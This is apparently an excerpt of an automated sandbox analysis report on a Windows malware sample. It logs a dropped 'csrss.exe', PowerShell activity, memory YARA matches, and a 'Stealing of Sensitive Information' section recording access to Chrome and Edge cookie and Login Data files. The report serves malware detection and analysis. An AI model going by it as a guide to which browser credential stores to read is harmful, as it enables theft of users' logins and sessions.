                        Source: 4nHrKBXqqqVJFZFp.exe, 00000014.00000000.1473759100.00000000012C1000.00000002.00000001.00040000.00000000.sdmp, 4nHrKBXqqqVJFZFp.exe, 00000014.00000002.3627485503.00000000012C0000.00000002.00000001.00040000.00000000.sdmp, 4nHrKBXqqqVJFZFp.exe, 00000016.00000002.3627349118.0000000001510000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                        Source: 4nHrKBXqqqVJFZFp.exe, 00000014.00000000.1473759100.00000000012C1000.00000002.00000001.00040000.00000000.sdmp, 4nHrKBXqqqVJFZFp.exe, 00000014.00000002.3627485503.00000000012C0000.00000002.00000001.00040000.00000000.sdmp, 4nHrKBXqqqVJFZFp.exe, 00000016.00000002.3627349118.0000000001510000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                        Source: 4nHrKBXqqqVJFZFp.exe, 00000014.00000000.1473759100.00000000012C1000.00000002.00000001.00040000.00000000.sdmp, 4nHrKBXqqqVJFZFp.exe, 00000014.00000002.3627485503.00000000012C0000.00000002.00000001.00040000.00000000.sdmp, 4nHrKBXqqqVJFZFp.exe, 00000016.00000002.3627349118.0000000001510000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                        Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,12_2_03805694
                        Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: GetLocaleInfoA,12_2_0380A28C
                        Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: GetLocaleInfoA,12_2_0380A2D8
                        Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,12_2_038057A0
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 12_2_03808D0C GetLocalTime,12_2_03808D0C
                        Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 12_2_0381A94C GetUserNameA,12_2_0381A94C
                        Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 12_2_0380B20C GetVersionExA,12_2_0380B20C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: 17.2.iaoqralA.pif.400000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.2.iaoqralA.pif.400000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000016.00000002.3629881400.0000000005360000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000002.3625364823.0000000002400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000002.3627870487.0000000004070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000002.3627956403.00000000040C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.1583072891.0000000035BE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.1552868362.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000014.00000002.3628025430.0000000002940000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.1579411162.00000000311A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                        Source: C:\Windows\SysWOW64\systeminfo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                        Source: C:\Windows\SysWOW64\systeminfo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Windows\SysWOW64\systeminfo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Windows\SysWOW64\systeminfo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Windows\SysWOW64\systeminfo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Windows\SysWOW64\systeminfo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
